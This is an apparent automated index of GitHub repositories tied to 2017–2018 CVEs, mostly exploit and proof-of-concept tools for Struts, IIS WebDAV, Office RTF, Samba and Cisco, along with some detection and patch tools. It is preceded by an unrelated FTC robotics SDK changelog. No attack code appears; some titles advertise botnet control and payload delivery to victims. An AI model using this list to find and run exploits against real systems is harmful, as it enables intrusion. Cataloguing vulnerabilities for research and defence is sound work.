Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.** : [chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020](https://api.github.com/repos/chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020) create time: 2021-03-08T11:34:11Z

**Spawn to shell without any credentials by using CVE-2018-10933 (LibSSH)** : [blacknbunny/CVE-2018-10933](https://api.github.com/repos/blacknbunny/CVE-2018-10933) create time: 2018-10-17T14:14:12Z

**solution** : [theJuan1112/pentesterlab-cve-2018-6574](https://api.github.com/repos/theJuan1112/pentesterlab-cve-2018-6574) create time: 2021-03-23T21:10:23Z

**None** : [0xAJ2K/CVE-2018-15961](https://api.github.com/repos/0xAJ2K/CVE-2018-15961) create time: 2021-03-24T21:27:25Z

**CVE-2018-8639-EXP** : [timwhitez/CVE-2018-8639-EXP](https://api.github.com/repos/timwhitez/CVE-2018-8639-EXP) create time: 2019-12-27T07:39:07Z

**None** : [siramk/CVE-2018-1335](https://api.github.com/repos/siramk/CVE-2018-1335) create time: 2021-03-26T11:51:23Z

**Test if your system is vulernable for cve_2018_19788.** : [robertdebock/ansible-role-cve_2018_19788](https://api.github.com/repos/robertdebock/ansible-role-cve_2018_19788) create time: 2018-12-07T20:53:47Z

**Nintendo CVE 2018-6242** : [Kinesys/Kinesys-Nintendo-CVE-2018-6242](https://api.github.com/repos/Kinesys/Kinesys-Nintendo-CVE-2018-6242) create time: 2021-04-02T05:00:05Z

**None** : [delina1/CVE-2018-8174](https://api.github.com/repos/delina1/CVE-2018-8174) create time: 2021-04-05T02:27:49Z

**None** : [delina1/CVE-2018-8174_EXP](https://api.github.com/repos/delina1/CVE-2018-8174_EXP) create time: 2021-04-05T02:31:54Z

**This Tool Aims to Exploit the CVE-2018-13341** : [Rajchowdhury420/CVE-2018-13341](https://api.github.com/repos/Rajchowdhury420/CVE-2018-13341) create time: 2021-04-05T13:37:28Z

**OpenSSL CVE-2017-3730 proof-of-concept** : [guidovranken/CVE-2017-3730](https://api.github.com/repos/guidovranken/CVE-2017-3730) create time: 2017-01-22T00:40:34Z

**Ian Beer's exploit for CVE-2017-2370 (kernel memory r/w on iOS 10.2) https://bugs.chromium.org/p/project-zero/issues/detail?id=1004** : [maximehip/extra_recipe](https://api.github.com/repos/maximehip/extra_recipe) create time: 2017-01-26T19:47:43Z

**Ian Beer's exploit for CVE-2017-2370 (kernel memory r/w on iOS 10.2)** : [JackBro/extra_recipe](https://api.github.com/repos/JackBro/extra_recipe) create time: 2017-02-02T11:16:38Z

**CVE-2017-2370** : [Rootkitsmm-zz/extra_recipe-iOS-10.2](https://api.github.com/repos/Rootkitsmm-zz/extra_recipe-iOS-10.2) create time: 2017-02-13T21:32:40Z

**None** : [cvele-test/vladimir-cvetic-techtask-20170209](https://api.github.com/repos/cvele-test/vladimir-cvetic-techtask-20170209) create time: 2017-02-18T14:18:06Z

**Struts2 S2-045(CVE-2017-5638)Vulnerability environment - http://www.mottoin.com/97954.html** : [PolarisLab/S2-045](https://api.github.com/repos/PolarisLab/S2-045) create time: 2017-03-07T05:30:30Z

**None** : [bongbongco/cve-2017-5638](https://api.github.com/repos/bongbongco/cve-2017-5638) create time: 2017-03-08T04:17:33Z

**S2-045 漏洞 POC-TOOLS CVE-2017-5638** : [jas502n/S2-045-EXP-POC-TOOLS](https://api.github.com/repos/jas502n/S2-045-EXP-POC-TOOLS) create time: 2017-03-09T19:40:47Z

**Ansible role for workaround for CVE-2017-2636 (Red Hat) - https://access.redhat.com/security/cve/CVE-2017-2636** : [alexzorin/cve-2017-2636-el](https://api.github.com/repos/alexzorin/cve-2017-2636-el) create time: 2017-03-09T23:20:42Z

**Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)** : [mthbernardes/strutszeiro](https://api.github.com/repos/mthbernardes/strutszeiro) create time: 2017-03-10T04:23:41Z

**Tweaking original PoC (https://github.com/rapid7/metasploit-framework/issues/8064) to work on self-signed certificates ** : [aljazceru/CVE-2017-5638-Apache-Struts2](https://api.github.com/repos/aljazceru/CVE-2017-5638-Apache-Struts2) create time: 2017-03-11T09:39:09Z

**These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)** : [ret2jazzy/Struts-Apache-ExploitPack](https://api.github.com/repos/ret2jazzy/Struts-Apache-ExploitPack) create time: 2017-03-12T06:28:51Z

**A php based exploiter for CVE-2017-5638.** : [lolwaleet/ExpStruts](https://api.github.com/repos/lolwaleet/ExpStruts) create time: 2017-03-12T13:03:52Z

**Example PoC Code for CVE-2017-5638 | Apache Struts Exploit ** : [xsscx/cve-2017-5638](https://api.github.com/repos/xsscx/cve-2017-5638) create time: 2017-03-10T16:56:14Z

**Struts2 S2-045(CVE-2017-5638)Exp with GUI** : [Flyteas/Struts2-045-Exp](https://api.github.com/repos/Flyteas/Struts2-045-Exp) create time: 2017-03-07T10:30:20Z

**test struts2 vulnerability CVE-2017-5638 in Mac OS X** : [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://api.github.com/repos/sjitech/test_struts2_vulnerability_CVE-2017-5638) create time: 2017-03-11T10:03:54Z

**This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)** : [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://api.github.com/repos/Masahiro-Yamada/OgnlContentTypeRejectorValve) create time: 2017-03-11T03:18:12Z

**Demo Application and Exploit** : [immunio/apache-struts2-CVE-2017-5638](https://api.github.com/repos/immunio/apache-struts2-CVE-2017-5638) create time: 2017-03-10T21:33:25Z

**None** : [paralelo14/CVE_2017_5638](https://api.github.com/repos/paralelo14/CVE_2017_5638) create time: 2017-03-10T15:16:44Z

**Exploiting Edge's read:// urlhandler** : [Dankirk/cve-2017-0065](https://api.github.com/repos/Dankirk/cve-2017-0065) create time: 2017-03-15T13:01:29Z

**Struts2 RCE CVE-2017-5638 non-intrusive check shell script** : [opt9/Strutshock](https://api.github.com/repos/opt9/Strutshock) create time: 2017-03-16T02:59:22Z

**CVE: 2017-5638 in different formats** : [random-robbie/CVE-2017-5638](https://api.github.com/repos/random-robbie/CVE-2017-5638) create time: 2017-03-11T11:22:44Z

**전자부품연구원 콘텐츠응용연구센터 첫번째 개발 과제 openCV와 python을 활용한 얼굴 인식(Recognition) 프로그램** : [jungining/2017_OpenCVEX_faceRecog_Python](https://api.github.com/repos/jungining/2017_OpenCVEX_faceRecog_Python) create time: 2017-03-07T02:31:32Z

**poc of CVE-2017-0478** : [JiounDai/CVE-2017-0478](https://api.github.com/repos/JiounDai/CVE-2017-0478) create time: 2017-03-19T02:18:37Z

**TYPO3 v7.6.15 Unencrypted Login Request Assigned CVE Number: CVE-2017-6370** : [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://api.github.com/repos/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request) create time: 2017-03-20T05:51:07Z

**Example PHP Exploiter for CVE-2017-5638** : [oktavianto/CVE-2017-5638-Apache-Struts2](https://api.github.com/repos/oktavianto/CVE-2017-5638-Apache-Struts2) create time: 2017-03-13T11:39:55Z

**None** : [bhagdave/CVE-2017-5638](https://api.github.com/repos/bhagdave/CVE-2017-5638) create time: 2017-03-18T09:39:59Z

**None** : [k0keoyo/CVE-2017-0038-EXP-C-JS](https://api.github.com/repos/k0keoyo/CVE-2017-0038-EXP-C-JS) create time: 2017-03-22T13:59:48Z

**None** : [jrrombaldo/CVE-2017-5638](https://api.github.com/repos/jrrombaldo/CVE-2017-5638) create time: 2017-03-11T10:43:16Z

**Struts2 RCE CVE-2017-5638 CLI shell** : [opt9/Strutscli](https://api.github.com/repos/opt9/Strutscli) create time: 2017-03-28T04:31:44Z

**An exploit for Microsoft IIS 6.0 CVE-2017-7269** : [eliuha/webdav_exploit](https://api.github.com/repos/eliuha/webdav_exploit) create time: 2017-03-29T05:59:30Z

**exec 8 bytes command** : [caicai1355/CVE-2017-7269-exploit](https://api.github.com/repos/caicai1355/CVE-2017-7269-exploit) create time: 2017-03-29T12:52:54Z

**Poc for iis6.0** : [M1a0rz/CVE-2017-7269](https://api.github.com/repos/M1a0rz/CVE-2017-7269) create time: 2017-03-30T04:35:13Z

**CVE-2017-5638** : [gsfish/S2-Reaper](https://api.github.com/repos/gsfish/S2-Reaper) create time: 2017-03-23T08:44:10Z

**None** : [whiteHat001/cve-2017-7269picture](https://api.github.com/repos/whiteHat001/cve-2017-7269picture) create time: 2017-03-30T12:03:05Z

**fixed msf module for cve-2017-7269** : [zcgonvh/cve-2017-7269](https://api.github.com/repos/zcgonvh/cve-2017-7269) create time: 2017-03-30T22:20:36Z

**CVE-2017-5005 for Quick Heal Antivirus** : [payatu/QuickHeal](https://api.github.com/repos/payatu/QuickHeal) create time: 2017-01-02T11:21:00Z

**None** : [mcassano/cve-2017-5638](https://api.github.com/repos/mcassano/cve-2017-5638) create time: 2017-03-26T01:58:52Z

**Apache Struts (CVE-2017-5638) Shell** : [falcon-lnhg/StrutsShell](https://api.github.com/repos/falcon-lnhg/StrutsShell) create time: 2017-03-17T18:05:55Z

**None** : [jrrombaldo/CVE-2017-7269](https://api.github.com/repos/jrrombaldo/CVE-2017-7269) create time: 2017-04-04T08:47:22Z

**cve-2017-5638 Vulnerable site sample** : [jrrdev/cve-2017-5638](https://api.github.com/repos/jrrdev/cve-2017-5638) create time: 2017-03-15T00:19:33Z

**iis6 exploit 2017 CVE-2017-7269** : [g0rx/iis6-exploit-2017-CVE-2017-7269](https://api.github.com/repos/g0rx/iis6-exploit-2017-CVE-2017-7269) create time: 2017-04-05T23:21:12Z

**Ruby Exploit for IIS 6.0 Buffer Overflow (CVE-2017-7269)** : [slimpagey/IIS_6.0_WebDAV_Ruby](https://api.github.com/repos/slimpagey/IIS_6.0_WebDAV_Ruby) create time: 2017-04-06T13:27:20Z

**poc and vulnerability analysis of CVE-2017-0541** : [JiounDai/CVE-2017-0541](https://api.github.com/repos/JiounDai/CVE-2017-0541) create time: 2017-04-08T14:28:22Z

**Zurmo-Stable-3.1.1 Cross Site Scripting (XSS) Assigned CVE Number: CVE-2017-7188** : [faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC](https://api.github.com/repos/faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC) create time: 2017-04-10T10:52:13Z

**Exploit for CVE-2017-6971 remote command execution in nfsen 1.3.7.** : [patrickfreed/nfsen-exploit](https://api.github.com/repos/patrickfreed/nfsen-exploit) create time: 2017-04-10T00:13:24Z

**A writeup of CVE-2017-7648** : [notmot/CVE-2017-7648.](https://api.github.com/repos/notmot/CVE-2017-7648.) create time: 2017-04-10T18:41:59Z

**CVE-2017-3881 Cisco Catalyst Remote Code Execution PoC** : [artkond/cisco-rce](https://api.github.com/repos/artkond/cisco-rce) create time: 2017-04-10T03:44:04Z

**None** : [ryhanson/CVE-2017-0199](https://api.github.com/repos/ryhanson/CVE-2017-0199) create time: 2017-04-13T02:41:36Z

**None** : [ryhanson/CVE-2017-0106](https://api.github.com/repos/ryhanson/CVE-2017-0106) create time: 2017-04-13T02:42:08Z

**None** : [ryhanson/CVE-2017-0204](https://api.github.com/repos/ryhanson/CVE-2017-0204) create time: 2017-04-13T02:42:24Z

**None** : [homjxi0e/cve-2017-7269](https://api.github.com/repos/homjxi0e/cve-2017-7269) create time: 2017-04-13T09:27:01Z

**None** : [SyFi/cve-2017-0199](https://api.github.com/repos/SyFi/cve-2017-0199) create time: 2017-04-13T16:40:27Z

**Addressbar spoofing through blob URL (Firefox browser). An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by blob: as the protocol, leading to user confusion and further spoofing attacks.** : [649/CVE-2017-5415](https://api.github.com/repos/649/CVE-2017-5415) create time: 2017-04-14T04:55:41Z

**None** : [homjxi0e/CVE-2017-0108](https://api.github.com/repos/homjxi0e/CVE-2017-0108) create time: 2017-04-15T02:10:16Z

**Exploit developed by me for CVE-2017-5633.** : [cardangi/Exploit-CVE-2017-5633](https://api.github.com/repos/cardangi/Exploit-CVE-2017-5633) create time: 2017-04-18T01:44:33Z

**Proof of concept exploit for CVE-2017-3599** : [SECFORCE/CVE-2017-3599](https://api.github.com/repos/SECFORCE/CVE-2017-3599) create time: 2017-04-18T17:08:39Z

**CVE-2017-0199** : [haibara3839/CVE-2017-0199-master](https://api.github.com/repos/haibara3839/CVE-2017-0199-master) create time: 2017-04-19T04:15:54Z

**None** : [homjxi0e/CVE-2017-3881-exploit-cisco-](https://api.github.com/repos/homjxi0e/CVE-2017-3881-exploit-cisco-) create time: 2017-04-20T00:52:10Z

**Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.** : [Exploit-install/CVE-2017-0199](https://api.github.com/repos/Exploit-install/CVE-2017-0199) create time: 2017-04-22T04:01:38Z

**Exploit toolkit for vulnerability RCE Microsoft RTF** : [zakybstrd21215/PoC-CVE-2017-0199](https://api.github.com/repos/zakybstrd21215/PoC-CVE-2017-0199) create time: 2017-04-22T11:32:39Z

**Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.** : [n1shant-sinha/CVE-2017-0199](https://api.github.com/repos/n1shant-sinha/CVE-2017-0199) create time: 2017-04-23T13:58:30Z

**CVE-2017-7269** : [xiaovpn/CVE-2017-7269](https://api.github.com/repos/xiaovpn/CVE-2017-7269) create time: 2017-04-24T08:42:59Z

**Quick and dirty fix to OLE2 executing code via .hta** : [NotAwful/CVE-2017-0199-Fix](https://api.github.com/repos/NotAwful/CVE-2017-0199-Fix) create time: 2017-04-18T06:33:45Z

**An exploit implementation for RCE in RTF & DOCs (CVE-2017-0199)** : [kn0wm4d/htattack](https://api.github.com/repos/kn0wm4d/htattack) create time: 2017-04-24T23:44:31Z

**None** : [joke998/Cve-2017-0199](https://api.github.com/repos/joke998/Cve-2017-0199) create time: 2017-04-25T03:38:15Z

**Cve-2017-0199** : [joke998/Cve-2017-0199-](https://api.github.com/repos/joke998/Cve-2017-0199-) create time: 2017-04-25T03:48:53Z

**S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)** : [KarzsGHR/S2-046_S2-045_POC](https://api.github.com/repos/KarzsGHR/S2-046_S2-045_POC) create time: 2017-03-21T17:36:40Z

**None** : [homjxi0e/CVE-2017-3881-Cisco](https://api.github.com/repos/homjxi0e/CVE-2017-3881-Cisco) create time: 2017-05-02T23:21:53Z

**None** : [CerberusSecurity/CVE-2017-5689](https://api.github.com/repos/CerberusSecurity/CVE-2017-5689) create time: 2017-05-04T01:51:26Z

**None** : [homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset](https://api.github.com/repos/homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset) create time: 2017-05-04T19:05:12Z

**Apache Struts 2.0 RCE vulnerability - Allows an attacker to inject OS commands into a web application through the content-type header ** : [payatu/CVE-2017-5638](https://api.github.com/repos/payatu/CVE-2017-5638) create time: 2017-05-05T13:17:37Z

**a plugin that protects your wp site from the CVE-2017-8295 vulnerability** : [alash3al/wp-allowed-hosts](https://api.github.com/repos/alash3al/wp-allowed-hosts) create time: 2017-05-05T16:34:17Z

**simple python poc for CVE-2017-5689** : [Bijaye/intel_amt_bypass](https://api.github.com/repos/Bijaye/intel_amt_bypass) create time: 2017-05-09T08:55:39Z

**CVE-2017-8779 aka RPCBomb** : [drbothen/GO-RPCBOMB](https://api.github.com/repos/drbothen/GO-RPCBOMB) create time: 2017-05-09T22:43:10Z

**None** : [homjxi0e/CVE-2017-0290-](https://api.github.com/repos/homjxi0e/CVE-2017-0290-) create time: 2017-05-11T04:01:51Z

**Cisco Catalyst Remote Code Execution PoC** : [zakybstrd21215/PoC-CVE-2017-3881](https://api.github.com/repos/zakybstrd21215/PoC-CVE-2017-3881) create time: 2017-05-11T12:11:51Z

**None** : [baonq-me/cve2017-5689](https://api.github.com/repos/baonq-me/cve2017-5689) create time: 2017-05-15T04:08:27Z

**CVE-2017-7269 to webshell or shellcode loader** : [zcgonvh/cve-2017-7269-tool](https://api.github.com/repos/zcgonvh/cve-2017-7269-tool) create time: 2017-05-16T18:47:45Z

**None** : [smythtech/DWF-CVE-2017-1000000](https://api.github.com/repos/smythtech/DWF-CVE-2017-1000000) create time: 2017-05-17T10:14:54Z

**Joomla 3.7 SQL injection (CVE-2017-8917)** : [brianwrf/Joomla3.7-SQLi-CVE-2017-8917](https://api.github.com/repos/brianwrf/Joomla3.7-SQLi-CVE-2017-8917) create time: 2017-05-19T15:21:46Z

**Install patch for CVE-2017-0145 AKA WannaCry.** : [MelonSmasher/chef_tissues](https://api.github.com/repos/MelonSmasher/chef_tissues) create time: 2017-05-19T13:55:06Z

**Admidio 3.2.8 Cross-Site Request Forgery Assigned CVE Number: CVE-2017-8382** : [faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc](https://api.github.com/repos/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc) create time: 2017-05-21T13:36:51Z

**Quick assessment script for CVE2017-7494 in a distribution-agnostic way** : [gunsan92/CVE2017-7494_quicktest](https://api.github.com/repos/gunsan92/CVE2017-7494_quicktest) create time: 2017-05-26T02:43:05Z

**CVE-2017-7494 - Detection Scripts** : [Waffles-2/SambaCry](https://api.github.com/repos/Waffles-2/SambaCry) create time: 2017-05-26T07:28:26Z

**None** : [homjxi0e/CVE-2017-7494](https://api.github.com/repos/homjxi0e/CVE-2017-7494) create time: 2017-05-25T14:13:10Z

**Simple script using nmap to detect CVE-2017-0143 MS17-010 in your network** : [valarauco/wannafind](https://api.github.com/repos/valarauco/wannafind) create time: 2017-05-16T19:34:38Z

** An exploit for Apache Struts CVE-2017-5638** : [c002/Apache-Struts](https://api.github.com/repos/c002/Apache-Struts) create time: 2017-10-19T02:40:45Z

**It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).** : [brianwrf/SambaHunter](https://api.github.com/repos/brianwrf/SambaHunter) create time: 2017-05-30T15:08:32Z

